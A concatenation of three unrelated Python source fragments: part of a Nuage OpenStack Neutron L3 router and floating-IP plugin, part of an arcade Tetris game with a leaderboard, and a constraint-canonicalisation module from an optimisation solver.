router_updates.get('rd', ent_rtr_mapping.get('nuage_rtr_rd'))
}
nuagedb.update_entrouter_mapping(ent_rtr_mapping, ns_dict)
@nuage_utils.handle_nuage_api_error
@lib_db_api.retry_if_session_inactive()
@log_helpers.log_method_call
def delete_router(self, context, id):
neutron_router = self.get_router(context, id)
session = context.session
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(session, id)
# Can probably be removed after blueprint enginefacade-switch reaches
# router-delete code upstream.
# https://blueprints.launchpad.net/neutron/+spec/enginefacade-switch
try:
session.expunge(ent_rtr_mapping)
except Exception as e:
LOG.warn('Got exception when expunging session: {}'.format(str(e)))
if ent_rtr_mapping:
LOG.debug("Enterprise to router mapping found for router %s", id)
filters = {
'device_id': [id],
'device_owner': [lib_constants.DEVICE_OWNER_ROUTER_INTF]
}
ports = self.core_plugin.get_ports(context, filters)
if ports:
raise l3_exc.RouterInUse(router_id=id)
nuage_domain_id = ent_rtr_mapping['nuage_router_id']
vsd_retry_error_codes = [(vsd_constants.CONFLICT_ERR_CODE,
vsd_constants.VSD_VM_EXISTS_ON_VPORT),
(vsd_constants.CONFLICT_ERR_CODE,
vsd_constants.VSD_PG_IN_USE),
(vsd_constants.CONFLICT_ERR_CODE,
vsd_constants.VSD_VM_EXIST)]
nuage_utils.retry_on_vsdclient_error(
self.vsdclient.delete_l3domain,
nr_attempts=cfg.CONF.RESTPROXY.
server_max_retries_on_domain_delete,
vsd_error_codes=vsd_retry_error_codes)(nuage_domain_id)
super(NuageL3Plugin, self).delete_router(context, id)
if ent_rtr_mapping and not self._check_router_subnet_for_tenant(
context, neutron_router['tenant_id']):
LOG.debug("No router/subnet found for tenant %s",
neutron_router['tenant_id'])
user_id, group_id = self.vsdclient.get_usergroup(
neutron_router['tenant_id'],
ent_rtr_mapping['net_partition_id'])
self.vsdclient.delete_user(user_id)
self.vsdclient.delete_group(group_id)
@log_helpers.log_method_call
def _check_fip_on_port_with_multiple_ips(self, context, port_id):
# Block associating a fip to a port with multiple ip as of 5.3.1
if port_id:
port = self.core_plugin._get_port(context, port_id)
fixed_ips = port['fixed_ips']
if not fixed_ips:
return
ipv4s, ipv6s = self.count_fixed_ips_per_version(fixed_ips)
if ipv4s > 1 or ipv6s > 1:
msg = _('floating ip cannot be associated to '
'port {} because it has multiple ipv4 or multiple ipv6'
'ips.').format(port_id)
raise nuage_exc.NuageBadRequest(msg=msg)
@log_helpers.log_method_call
def _check_floatingip_update(self, context, port,
vport_type=constants.VM_VPORT,
vport_id=None):
filter = {'fixed_port_id': [port['id']]}
local_fip = self.get_floatingips(context,
filters=filter)
if local_fip:
fip = local_fip[0]
self._create_update_floatingip(context,
fip, port['id'],
vport_type=vport_type,
vport_id=vport_id,
rate_update=False)
@log_helpers.log_method_call
def _create_update_floatingip(self, context,
neutron_fip, port_id,
last_known_router_id=None,
vport_type=constants.VM_VPORT,
vport_id=None,
rate_update=True):
ent_rtr_mapping, fip_pool, nuage_vport = self._validate_processing_fip(
context, last_known_router_id, neutron_fip, port_id, vport_id,
vport_type)
params = {
'fip_id': neutron_fip['id'],
}
fip = self.vsdclient.get_nuage_fip_by_id(params)
if not fip:
LOG.debug("Floating ip not found in VSD for fip %s",
neutron_fip['id'])
params = {
'nuage_rtr_id': ent_rtr_mapping['nuage_router_id'],
'nuage_fippool_id': fip_pool['nuage_fip_pool_id'],
'neutron_fip_ip': neutron_fip['floating_ip_address'],
'neutron_fip_id': neutron_fip['id']
}
fip = self.vsdclient.create_nuage_floatingip_details(
params)
nuage_fip_id = fip['ID']
nuage_fip_associated = fip['assigned']
needs_fip_association = not nuage_fip_associated
else:
nuage_fip_id = fip['nuage_fip_id']
nuage_fip_associated = fip['nuage_assigned']
needs_fip_association = not nuage_fip_associated
if nuage_vport and nuage_fip_associated:
n_vport = self.vsdclient.get_vport_assoc_with_fip(nuage_fip_id)
if n_vport and n_vport['ID'] != nuage_vport['ID']:
needs_fip_association = True
old_os_port_id = strip_cms_id(n_vport['externalID'])
disassoc_params = {
'nuage_vport_id': n_vport['ID'],
'nuage_fip_id': None
}
self.vsdclient.update_nuage_vm_vport(disassoc_params)
self.vsdclient.delete_rate_limiting(
n_vport['ID'], neutron_fip['id'])
self.fip_rate_log.info('FIP %s (owned by tenant %s) '
'disassociated from port %s' % (
neutron_fip['id'],
neutron_fip['tenant_id'],
old_os_port_id))
if (nuage_vport['domainID'] !=
ent_rtr_mapping['nuage_router_id']):
nuage_fip_id = self._move_fip_to_different_domain(
context,
ent_rtr_mapping,
fip_pool,
neutron_fip,
nuage_vport['domainID'])
else:
nuage_fip_id = fip['nuage_fip_id']
if nuage_vport and needs_fip_association:
params = {
'nuage_vport_id': nuage_vport['ID'],
'nuage_fip_id': nuage_fip_id
}
self.vsdclient.update_nuage_vm_vport(params)
self.fip_rate_log.info(
'FIP %s (owned by tenant %s) associated to port %s'
% (neutron_fip['id'], neutron_fip['tenant_id'], port_id))
# Check if we have to associate a FIP to a VIP
self._process_fip_to_vip(context, port_id, nuage_fip_id)
if rate_update:
self._process_fip_rate_limiting(neutron_fip, nuage_vport)
def _move_fip_to_different_domain(self, context, ent_rtr_mapping, fip_pool,
neutron_fip, new_domain_id):
fip_dict = {
'fip_id': neutron_fip['id'],
'fip_last_known_rtr_id': ent_rtr_mapping['router_id']
}
self._delete_nuage_fip(context, fip_dict)
LOG.debug("Floating ip on VSD is deleted for fip %s",
neutron_fip['id'])
params = {
'nuage_rtr_id': new_domain_id,
'nuage_fippool_id': fip_pool['nuage_fip_pool_id'],
'neutron_fip_ip':
neutron_fip['floating_ip_address'],
'neutron_fip_id': neutron_fip['id']
}
nuage_fip_id = self.vsdclient.create_nuage_floatingip(
params)
return nuage_fip_id
def _validate_processing_fip(self, context, last_known_router_id,
neutron_fip, port_id, vport_id, vport_type):
nuage_vport = None
if last_known_router_id:
rtr_id = last_known_router_id
else:
rtr_id = neutron_fip['router_id']
net_id = neutron_fip['floating_network_id']
subn = nuagedb.get_ipalloc_for_fip(context.session,
net_id,
neutron_fip['floating_ip_address'])
subnet_mapping = nuagedb.get_subnet_l2dom_by_id(context.session,
subn['subnet_id'])
fip_pool = self.vsdclient.get_nuage_fip_pool_by_id(
subnet_mapping['nuage_subnet_id'])
if not fip_pool:
msg = _('sharedresource %s not found on VSD') % subn['subnet_id']
raise n_exc.BadRequest(resource='floatingip',
msg=msg)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(context.session,
rtr_id)
if not ent_rtr_mapping:
msg = _('router %s is not associated with '
'any net-partition') % rtr_id
raise n_exc.BadRequest(resource='floatingip',
msg=msg)
if port_id:
port_details = self.core_plugin._get_port(context, port_id)
if self.needs_vport_for_fip_association(
port_details.get('device_owner')):
nuage_vport = self._get_vport_for_fip(context, port_id,
vport_type=vport_type,
vport_id=vport_id,
required=True)
else:
nuage_vport = self._get_vport_for_fip(context, port_id,
vport_type=vport_type,
vport_id=vport_id,
required=False)
return ent_rtr_mapping, fip_pool, nuage_vport
def _process_fip_rate_limiting(self, neutron_fip, nuage_vport):
# Add QOS to port for rate limiting
nuage_fip_rate = neutron_fip.get('nuage_fip_rate_values')
nuage_fip_rate_configured = nuage_fip_rate.pop('cli_configured', None)
if nuage_fip_rate_configured and not nuage_vport:
msg = _('Rate limiting requires the floating ip to be '
'associated to a port.')
raise nuage_exc.NuageBadRequest(msg=msg)
if nuage_fip_rate_configured and not nuage_vport:
del neutron_fip['nuage_fip_rate_values']
if | |
", rx_xposn-(rx_width/2)+20, h_5b, arcade.color.BLACK, float(20), bold = True, align="left")
arcade.draw_text("Speed = (# of Levels) - Current Level + GAME_SPEED_FLOOR", rx_xposn-(rx_width/2)+20, h_5b-25, arcade.color.GRAY, float(15), bold = True, align="left")
if self.GAME_SPEED is not None:
t_5b = f"{self.GAME_SPEED} frames"
arcade.draw_text(t_5b, rx_xposn-(rx_width/2)+200, h_5b, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
# Frame Counter
h_1 = rx_yposn+(rx_height/2)-175
arcade.draw_text("Frame Counter: ", rx_xposn-(rx_width/2)+20, h_1, arcade.color.BLACK, float(20), bold = True, align="left")
arcade.draw_text(str(self.frame_count), rx_xposn-(rx_width/2)+200, h_1, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
# FPS
h_3 = rx_yposn+(rx_height/2)-200
arcade.draw_text("FPS: ", rx_xposn-(rx_width/2)+20, h_3, arcade.color.BLACK, float(20), bold = True, align="left")
if self.fps is not None:
t_4a = f"{self.fps:.2f}"
arcade.draw_text(t_4a, rx_xposn-(rx_width/2)+200, h_3, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
h_4 = rx_yposn+(rx_height/2)-225
arcade.draw_text("Time To Update: ", rx_xposn-(rx_width/2)+20, h_4, arcade.color.BLACK, float(20), bold = True, align="left")
if self.processing_time is not None:
t_4b = f"{self.processing_time:.8f} seconds"
arcade.draw_text(t_4b, rx_xposn-(rx_width/2)+200, h_4, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
# Levels
h_2 = rx_yposn+(rx_height/2)-275
t_2a = str(self.GAME_LEVEL_FRAMES[0:5])
t_2b = str(self.GAME_LEVEL_FRAMES[6:])
arcade.draw_text("Level Advance: ", rx_xposn-(rx_width/2)+20, h_2, arcade.color.BLACK, float(20), bold = True, align="left")
arcade.draw_text(t_2a, rx_xposn-(rx_width/2)+200, h_2, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
arcade.draw_text(t_2b, rx_xposn-(rx_width/2)+200, h_2-30, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
def draw_grid(self, grid, offset_x, offset_y):
""" Draw the grid. Used to draw the falling stones. The board is drawn by the sprite list. """
# Draw the grid
for row in range(len(grid)):
for column in range(len(grid[0])):
# Figure out what color to draw the box
if grid[row][column]:
color = colors[grid[row][column]]
# Do the math to figure out where the box is
x = (MARGIN + WIDTH) * (column + offset_x) + SCREEN_MARGIN + WIDTH // 2 + WINDOW_MARGIN #MAY NEED FIXED WITH NEW SCREEN SIZE
y = TETRIS_HEIGHT - HIDE_BOTTOM - (MARGIN + HEIGHT) * (row + offset_y) + SCREEN_MARGIN + HEIGHT // 2 #MAY NEED FIXED WITH NEW SCREEN SIZE
# Draw the box
arcade.draw_rectangle_filled(x, y, WIDTH, HEIGHT, color)
# Advertisement Note
arcade.draw_rectangle_filled(WINDOW_WIDTH/2, 72, SCREEN_WIDTH, HEIGHT, arcade.color.BLACK)
arcade.draw_text("REGISTER TODAY @ HACK.OSU.EDU/2021", WINDOW_WIDTH/2, 78, arcade.color.WHITE, float(9), bold = True, align="center", anchor_x="center", anchor_y="center")
def on_draw(self):
""" Render the screen. """
# RX & Statistics
start_time = timeit.default_timer()
fps_calc_freq = 60
if self.frame_count % fps_calc_freq == 0:
if self.fps_start_timer is not None:
t_total = timeit.default_timer() - self.fps_start_timer
self.fps = fps_calc_freq / t_total
self.fps_start_timer = timeit.default_timer() #restart timer
# This command has to happen before we start drawing
arcade.start_render()
self.draw_background()
self.build_mscb()
self.draw_next_stone()
self.write_name()
self.game_diagnostics()
self.board_sprite_list.draw()
self.draw_grid(self.stone, self.stone_x, self.stone_y)
if self.game_over == True and self.addedScore == False :
ALL_SCORES.append( [ self.score, self.player_name, self.level ] ) #calls to function to add player to leaderboard
self.addedScore = True
ALL_SCORES.sort(reverse = True )
saveScores(ALL_SCORES)
print("Added score & Sorted Scoreboard")
print(ALL_SCORES)
if self.game_over == True:
self.game_over_cover()
def game_over_cover(self):
time.sleep(.2)
arcade.draw_rectangle_filled(WINDOW_WIDTH/2, SCREEN_HEIGHT/2, SCREEN_WIDTH, SCREEN_HEIGHT, (0,0,0,200))
gameover = arcade.load_texture(GAME_OVER)
arcade.draw_texture_rectangle( center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT * 5/6,
width= SCREEN_WIDTH*0.7, height= SCREEN_WIDTH*0.4, texture=gameover)
# player and score
name = self.player_name
score = str(self.score)
arcade.draw_text("CHALLENGER", WINDOW_WIDTH/2, SCREEN_HEIGHT*7/12, arcade.color.WHITE, 30, bold=True, align="center", anchor_x="center", anchor_y="center")
arcade.draw_text(name, WINDOW_WIDTH/2, SCREEN_HEIGHT*7/12-80, arcade.color.WHITE, 40, bold=True, align="center", anchor_x="center")
arcade.draw_text("SCORE", WINDOW_WIDTH/2, SCREEN_HEIGHT*5/12, arcade.color.WHITE, 30, bold=True, align="center", anchor_x="center", anchor_y="center")
arcade.draw_text(score, WINDOW_WIDTH/2, SCREEN_HEIGHT*5/12-60, arcade.color.WHITE, 40, bold=True, align="center", anchor_x="center", anchor_y="center")
def switch_to_leaderboard(self):
time.sleep(3)
next_view = LBView()
next_view.setup(self.score, self.player_name)
self.window.show_view(next_view)
def write_name(self):
""" Draw the mini score board when the player start playing. """
player_name = f"{self.player_name}"
arcade.draw_text("- CURRENT CHALLENGER -", SCREEN_WIDTH/2 + WINDOW_MARGIN, SCREEN_HEIGHT*0.9, arcade.color.BLACK, float(SCREEN_HEIGHT*0.021), align="center", anchor_x="center", anchor_y="center")
arcade.draw_text(player_name, SCREEN_WIDTH/2 + WINDOW_MARGIN, SCREEN_HEIGHT*0.87, arcade.color.BLACK, float(SCREEN_HEIGHT*0.02), bold=True, width=340, align="center", anchor_x="center", anchor_y="center")
def build_mscb(self):
""" Draw the mini score board when the player start playing. """
score_text = f"{self.score}"
level_text = f"{self.level}"
arcade.draw_rectangle_outline(e_mscb_xposn, e_mscb_yposn, e_mscb_width, e_mscb_height, [0,153,153], 2)
arcade.draw_text("SCORE", e_mscb_xposn-65, e_mscb_yposn - e_mscb_height*0, arcade.color.BLACK, float(SCREEN_HEIGHT*0.013), bold = True, align="left", anchor_y="center")
arcade.draw_text(score_text, e_mscb_xposn-50, e_mscb_yposn - e_mscb_height*0.3, arcade.color.BLACK, float(SCREEN_HEIGHT*0.030), bold = True, align="left", anchor_y="center")
arcade.draw_text("LEVEL", e_mscb_xposn-65, e_mscb_yposn + e_mscb_height*0.4, arcade.color.BLACK, float(SCREEN_HEIGHT*0.013), bold = True, align="left", anchor_y="center")
arcade.draw_text(level_text, e_mscb_xposn+00, e_mscb_yposn + e_mscb_height*0.2, arcade.color.BLACK, float(SCREEN_HEIGHT*0.030), bold = True, align="left", anchor_y="center")
arcade.draw_rectangle_outline(next_xposn, next_yposn, next_width, next_height, [0,153,153], 2)
#-- Game Logic
def update(self, dt):
""" Update, drop stone if warrented. Called by Arcade Class every 1/60 sec"""
# RX & Statistics (start timer)
start_time = timeit.default_timer()
#------------------------------------ FRAME RATE CONTROL
self.frame_count += 1
if self.game_over == True:
self.switch_to_leaderboard()
if self.frame_count % self.GAME_SPEED == 0:
if self.joystick and (self.joystick.y > 0.6): self.drop() # DOWN (vertical is flipped on input)
self.drop()
#- Update Game Speed
self.level_up()
#- JOYSTICK
# if self.joystick and (self.frame_count % 3 == 0):
# """JoyStick Control Input"""
# if self.joystick.x < -0.6: self.move(-1) # LEFT
# if self.joystick.x > 0.6: self.move(1) # RIGHT
# if self.joystick.y < -0.6: self.hard_drop() # UP
#- KEYBOARD
if self.frame_count % 3 == 0:
if self.down_pressed and self.frame_count - self.down_pressed > 10:
self.drop()
if not self.right_pressed and self.left_pressed and self.frame_count - self.left_pressed > 10:
self.move(-1)
elif not self.left_pressed and self.right_pressed and self.frame_count - self.right_pressed > 10:
self.move(1)
# RX & Statistics (stop timer)
self.processing_time = timeit.default_timer() - start_time
def level_up(self):
""" increase game speed as game progresses. ie. Get's faster the longer you play"""
idx = len(self.GAME_LEVEL_FRAMES) - 1
while idx >= 0:
if self.GAME_LEVEL_FRAMES[idx] < self.frame_count:
self.level = idx
self.GAME_SPEED = len(self.GAME_LEVEL_FRAMES)-idx + GAME_SPEED_FLOOR
break
idx -= 1
def update_board(self):
"""
Update the sprite list to reflect the contents of the 2d grid
"""
for row in range(len(self.board)):
for column in range(len(self.board[0])):
v = self.board[row][column]
i = row * COLUMN_COUNT + column
self.board_sprite_list[i].set_texture(v)
def on_key_press(self, key, modifiers):
"""
Handle user key presses
User goes left, move -1
User goes right, move 1
Rotate stone,
or drop down
F1 = MENU
F2 = LeaderBoard
F3 = Game Reset
"""
global GAME_SPEED_FLOOR
# GAME Play Commands
if key == arcade.key.LEFT:
self.left_pressed = self.frame_count
self.move(-1)
elif key == arcade.key.RIGHT:
self.right_pressed = self.frame_count
self.move(1)
elif key == arcade.key.UP:
self.rotate_stone()
elif key == arcade.key.DOWN or key==101:
self.down_pressed = self.frame_count
self.drop()
elif key == arcade.key.SPACE or key == 113:
self.hard_drop()
# GAME Central Commands
elif key == 65470:
print("---- MAIN MENU")
next_view = MenuView()
self.window.show_view(next_view)
elif key == 65471 or key == 65474:
print("---- LEADER BOARD")
next_view = LBView()
next_view.setup()
self.window.show_view(next_view)
elif key == 65472:
print("---- NEW PLAYER")
next_view = PNameView()
next_view.setup()
self.window.show_view(next_view)
elif key == 65365:
GAME_SPEED_FLOOR+=1
print("---- GAME_SPEED_FLOOR = " + str(GAME_SPEED_FLOOR))
elif key == 65366:
if GAME_SPEED_FLOOR > 0: GAME_SPEED_FLOOR-=1
print("---- GAME_SPEED_FLOOR = " + str(GAME_SPEED_FLOOR))
def on_key_release(self, key, modifiers):
"""
Handle user key presses
User goes left, move -1
User goes right, move 1
Rotate stone,
or drop down
F1 = MENU
F2 = LeaderBoard
F3 = Game Reset
"""
# GAME Play Commands
if key == arcade.key.LEFT:
self.left_pressed = False
elif key == arcade.key.RIGHT:
self.right_pressed = False
elif key == arcade.key.DOWN:
self.down_pressed = False
#===============================================================================
class MenuView(arcade.View):
def on_show(self):
arcade.set_background_color([187,0,0]) # Set Background. Required. Do not delete def!
def on_draw(self):
arcade.start_render()
# BACKGROUND
self.background = arcade.load_texture(BACKGROUNDS[1])
arcade.draw_texture_rectangle( center_x = WINDOW_WIDTH // 2, center_y = SCREEN_HEIGHT // 2,
width = SCREEN_WIDTH, height = SCREEN_HEIGHT,
texture = self.background )
# BUTTON GRAPHICS :D
# Buttons are not intended to be clickable
button = arcade.load_texture(BUTTONS[0])
arcade.draw_texture_rectangle( center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2 + TOWER_BUFFER,
width= SCREEN_WIDTH*0.58, height= SCREEN_HEIGHT*0.04, texture=button)
button = arcade.load_texture(BUTTONS[1])
arcade.draw_texture_rectangle( center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2 - (SCREEN_HEIGHT*0.05) + TOWER_BUFFER,
width= SCREEN_WIDTH*0.58, height= SCREEN_HEIGHT*0.04, texture=button)
button = arcade.load_texture(BUTTONS[2])
arcade.draw_texture_rectangle( center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2 - (SCREEN_HEIGHT*0.1) + TOWER_BUFFER,
width= SCREEN_WIDTH*0.58, height= SCREEN_HEIGHT*0.04, texture=button)
# TEXT - using graphic/textures for buttons now
#arcade.draw_text("[S] BEGIN GAME", SCREEN_WIDTH/2, SCREEN_HEIGHT/2,
# arcade.color.CADET_GREY, font_size=15, font_name='arial',
# align="center", anchor_x="center", anchor_y="center")
#arcade.draw_text("[L] LEADER BOARD", SCREEN_WIDTH/2, SCREEN_HEIGHT/2 - 30,
# arcade.color.CADET_GREY, font_size=15, font_name='arial',
# align="center", anchor_x="center", anchor_y="center")
def on_mouse_press(self, x, y, button, modifiers):
print("Clicking doesn't do anything")
def on_key_press(self, key, modifiers):
if key == 65470:
print("---- RELOAD MAIN MENU")
next_view = MenuView()
self.window.show_view(next_view)
if key == 65471 or key == 65474:
print("---- LEADER BOARD")
next_view = LBView()
next_view.setup()
self.window.show_view(next_view)
if key == 65472:
print("---- NEW PLAYER")
next_view = PNameView()
next_view.setup()
self.window.show_view(next_view)
if key == 65307: arcade.close_window()
#===============================================================================
class LBView(arcade.View):
def on_show(self):
# Set Background. Required. Do not delete def!
arcade.set_background_color([187,0,0])
def | |
<filename>ipsolver/_canonical_constraint.py
from __future__ import division, print_function, absolute_import
import numpy as np
import scipy.sparse as spc
from ._constraints import (NonlinearConstraint,
LinearConstraint,
BoxConstraint)
__all__ = ['CanonicalConstraint',
'to_canonical',
'lagrangian_hessian',
'empty_canonical_constraint']
class CanonicalConstraint:
"""Canonical constraint
Constraint of the form:
c_ineq <= 0
c_eq = 0
for:
c_ineq, c_eq = constr(x)
"""
def __init__(self, n_vars, n_ineq, n_eq,
constr, jac, hess, sparse_jacobian,
enforce_feasibility,
x0, c_ineq0, c_eq0, J_ineq0, J_eq0):
# Dimensions
self.n_vars = n_vars
self.n_ineq = n_ineq
self.n_eq = n_eq
# Objective function and constraints
self.constr = constr
self.jac = jac
self.hess = hess
# Use sparse jacobian flag
self.sparse_jacobian = sparse_jacobian
# Enforce feasibility for CanonicalConstraint. Should
# be a list of booleans (and never a single boolean value,
# as it is allowed for Box, Linear and Nonlinear constraints).
self.enforce_feasibility = enforce_feasibility
# Initial Values
self.x0 = x0
self.c_ineq0 = c_ineq0
self.c_eq0 = c_eq0
self.J_ineq0 = J_ineq0
self.J_eq0 = J_eq0
def to_canonical(constraints):
"""Convert constraints or list of constraints to canonical format."""
# Put ``constraints`` in list format whe needed
if isinstance(constraints, (NonlinearConstraint,
LinearConstraint,
BoxConstraint,
CanonicalConstraint)):
constraints = [constraints]
if isinstance(constraints, (list, tuple, np.array)):
# Converts all constraints to canonical format
constraints_list = []
for c in constraints:
if isinstance(c, CanonicalConstraint):
constraints_list += [c]
elif isinstance(c, (NonlinearConstraint)):
constraints_list += [_nonlinear_to_canonical(c)]
elif isinstance(c, (LinearConstraint)):
constraints_list += [_linear_to_canonical(c)]
elif isinstance(c, (BoxConstraint)):
constraints_list += [_box_to_canonical(c)]
else:
raise ValueError("Unknown Constraint type.")
# Concatenate constraints
if len(constraints_list) == 0:
raise ValueError("Empty list.")
elif len(constraints_list) == 1:
constr = constraints_list[0]
else:
constr = _concatenate_canonical_constraints(constraints_list)
else:
raise ValueError("Unknown Constraint type.")
return constr
def evaluated_to_canonical(constraints, list_c, list_J,
n_vars, n_eq, n_ineq, sparse_jacobian):
n_constr = len(constraints)
new_list_c = []
new_list_J = []
for i in range(n_constr):
constr = constraints[i]
c = list_c[i]
J = list_J[i]
eq, ineq, val_eq, val_ineq, sign, fun_len \
= _parse_constraint(constr.kind)
new_list_c += [_convert_constr(c, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign)]
if constr.sparse_jacobian:
new_list_J += [_convert_sparse_jac(J, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign)]
else:
new_list_J += [_convert_dense_jac(J, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign)]
if sparse_jacobian:
c_ineq, c_eq = _concatenate_constr(new_list_c)
J_ineq, J_eq = _concatenate_sparse_jac(new_list_J)
else:
c_ineq, c_eq = _concatenate_constr(new_list_c)
J_ineq, J_eq = _concatenate_dense_jac(new_list_J)
return c_ineq, c_eq, J_ineq, J_eq
def lagrangian_hessian(constraint, hess):
"""Generate lagrangian hessian."""
# Concatenate Hessians
def lagr_hess(x, v_eq=np.empty(0), v_ineq=np.empty(0)):
n = len(x)
hess_list = []
if hess is not None:
hess_list += [hess(x)]
if constraint.hess is not None:
hess_list += [constraint.hess(x, v_eq, v_ineq)]
def matvec(p):
result = np.zeros_like(p)
for h in hess_list:
result += h.dot(p)
return result
return spc.linalg.LinearOperator((n, n), matvec)
return lagr_hess
def empty_canonical_constraint(x0, n_vars, sparse_jacobian=None):
"""Return empty CanonicalConstraint."""
n_eq = 0
n_ineq = 0
empty_c = np.empty(0)
if sparse_jacobian or (sparse_jacobian is None):
empty_J = spc.csr_matrix(np.empty((0, n_vars)))
else:
empty_J = np.empty((0, n_vars))
def constr(x):
return empty_c, empty_c
def jac(x):
return empty_J, empty_J
enforce_feasibility = np.empty(0, dtype=bool)
return CanonicalConstraint(n_vars, n_ineq, n_eq,
constr, jac, None,
True, enforce_feasibility,
x0, empty_c, empty_c,
empty_J, empty_J)
# ************************************************************ #
# ********** Auxiliar Functions ********** #
# ************************************************************ #
def _nonlinear_to_canonical(nonlinear):
# Parse constraints
eq, ineq, val_eq, val_ineq, sign, fun_len \
= _parse_constraint(nonlinear.kind)
# Get dimensions
n_eq = len(eq)
n_ineq = len(ineq)
n_vars = nonlinear.n
def new_constr(x):
c = nonlinear.fun(x)
return _convert_constr(c, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign)
c_ineq0, c_eq0 = _convert_constr(nonlinear.f0, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign)
if nonlinear.sparse_jacobian:
def new_jac(x):
J = nonlinear.jac(x)
return _convert_sparse_jac(J, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign)
J_ineq0, J_eq0 = _convert_sparse_jac(nonlinear.J0, n_vars, n_eq,
n_ineq, eq, ineq, val_eq,
val_ineq, sign)
else:
def new_jac(x):
J = nonlinear.jac(x)
return _convert_dense_jac(J, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign)
J_ineq0, J_eq0 = _convert_dense_jac(nonlinear.J0, n_vars, n_eq,
n_ineq, eq, ineq, val_eq,
val_ineq, sign)
if nonlinear.hess is None:
new_hess = None
else:
def new_hess(x, v_eq=np.empty(0), v_ineq=np.empty(0)):
hess = nonlinear.hess
v = np.zeros(fun_len)
if len(v_eq) > 0:
v[eq] += v_eq
if len(v_ineq) > 0:
v[ineq[sign == 1]] += v_ineq[sign == 1]
v[ineq[sign == -1]] -= v_ineq[sign == -1]
return hess(x, v)
if n_ineq == 0:
enforce_feasibility = np.empty(0, dtype=bool)
else:
enforce_feasibility = nonlinear.enforce_feasibility[ineq]
return CanonicalConstraint(n_vars, n_ineq, n_eq,
new_constr, new_jac, new_hess,
nonlinear.sparse_jacobian,
enforce_feasibility, nonlinear.x0,
c_ineq0, c_eq0, J_ineq0, J_eq0)
def _linear_to_canonical(linear):
return _nonlinear_to_canonical(linear.to_nonlinear())
def _box_to_canonical(box):
return _linear_to_canonical(box.to_linear())
def _convert_constr(c, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign):
# Empty constraint
empty = np.empty((0,))
# Return equality and inequalit constraints
c_eq = c[eq] - val_eq if n_eq > 0 else empty
c_ineq = sign*(c[ineq] - val_ineq) if n_ineq > 0 else empty
return c_ineq, c_eq
def _convert_sparse_jac(J, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign):
# Empty jacobian
empty = spc.csr_matrix(np.empty((0, n_vars)))
# Compute equality and inequality Jacobian matrices
J_eq = J[eq, :] if n_eq > 0 else empty
if n_ineq > 0:
D = spc.lil_matrix((n_ineq, n_ineq))
D.setdiag(sign)
J_ineq = D*J[ineq, :]
else:
J_ineq = empty
# Return Jacobian matrices
return J_ineq, J_eq
def _convert_dense_jac(J, n_vars, n_eq, n_ineq,
eq, ineq, val_eq, val_ineq,
sign):
# Empty jacobian
empty = np.empty((0, n_vars))
# Compute equality and inequality Jacobian matrices
J_eq = J[eq, :] if n_eq > 0 else empty
if n_ineq > 0:
J_ineq = np.multiply(J[ineq, :], sign[:, np.newaxis])
else:
J_ineq = empty
# Return Jacobian matrices
return J_ineq, J_eq
def _parse_constraint(kind):
"""Read constraint type and return list of indices.
Parameters
----------
kind : tuple
Specifies the type of contraint. Options for this
parameters are:
- ("interval", lb, ub): for a constraint of the type:
lb[i] <= f[i] <= ub[i]
- ("greater", lb): for a constraint of the type:
f[i] >= lb[i]
- ("less", ub): for a constraint of the type:
f[i] <= ub[i]
- ("equals", c): for a constraint of the type:
f[i] == c[i]
where ``lb``, ``ub`` and ``c`` are (m,) ndarrays.
Returns
-------
eq : array_like
A vector indicating equality constraints.
len(eq) = number of equality constraints
ineq : array_like
A vector indicating inequality constraints.
len(ineq) = number of inequality constraints
val_eq : array_like
Equality constraint right hand side:
f[eq[i]] = val_eq[i]
val_ineq : array_like
Inequality constraint right hand side:
sign[i]*(f[ineq[i]] - val_ineq[i]) <= 0
sign : array_like
Sign of inequality constraints.
"""
if kind[0] == "equals":
# Read values from input structure
c = np.asarray(kind[1], dtype=float)
# Set returns
eq = np.arange(len(c), dtype=int)
ineq = np.empty(0, dtype=int)
val_eq = np.asarray(c)
val_ineq = np.empty(0)
sign = np.empty(0)
fun_len = len(c)
elif kind[0] in ("greater", "less", "interval"):
# Constraint type
if kind[0] == "greater":
lb = np.asarray(kind[1], dtype=float)
ub = np.full_like(lb, np.inf, dtype=float)
elif kind[0] == "less":
ub = np.asarray(kind[1], dtype=float)
lb = np.full_like(ub, -np.inf, dtype=float)
elif kind[0] == "interval":
lb = np.asarray(kind[1], dtype=float)
ub = np.asarray(kind[2], dtype=float)
# Set auxiliar values
arange = np.arange(len(lb), dtype=int)
ones = np.ones(len(lb))
lb_isinf = np.isinf(lb)
ub_isinf = np.isinf(ub)
eq_list = (lb == ub) & ~lb_isinf & ~ub_isinf
# Set returns
eq = arange[eq_list]
val_eq = lb[eq_list]
ineq = np.hstack((arange[~eq_list & ~lb_isinf],
arange[~eq_list & ~ub_isinf]))
val_ineq = np.hstack((lb[~eq_list & ~lb_isinf],
ub[~eq_list & ~ub_isinf]))
sign = np.hstack((-ones[~eq_list & ~lb_isinf],
ones[~eq_list & ~ub_isinf]))
fun_len = len(lb)
else:
raise RuntimeError("Never be here.")
return eq, ineq, val_eq, val_ineq, sign, fun_len
def _concatenate_canonical_constraints(constraints,
sparse_jacobian=None):
